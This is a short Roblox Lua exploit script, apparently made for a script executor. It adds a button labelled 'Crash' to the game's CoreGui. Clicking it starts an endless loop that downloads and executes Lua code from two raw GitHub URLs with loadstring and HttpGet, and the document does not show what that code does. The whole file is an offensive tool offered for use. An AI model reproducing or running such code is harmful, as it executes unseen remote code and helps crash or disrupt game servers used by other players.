-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local TextButton = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local UIGradient = Instance.new("UIGradient")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

TextButton.Parent = ScreenGui
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.Position = UDim2.new(0.735686302, 0, 0.546913564, 0)
TextButton.Size = UDim2.new(0, 200, 0, 50)
TextButton.Font = Enum.Font.Creepster
TextButton.Text = "Crash"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 50.000
TextButton.MouseButton1Down:connect(function()
	while wait() do

		loadstring(game:HttpGet("https://raw.githubusercontent.com/SubaruIPA/1/main/2"))()
		wait(2)
		loadstring(game:HttpGet("https://raw.githubusercontent.com/SubaruIPA/1/main/4"))()

	end
end)

UICorner.Parent = TextButton

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 255, 255)), ColorSequenceKeypoint.new(0.05, Color3.fromRGB(83, 246, 255)), ColorSequenceKeypoint.new(0.56, Color3.fromRGB(107, 255, 132)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 255, 255))}
UIGradient.Parent = TextButton
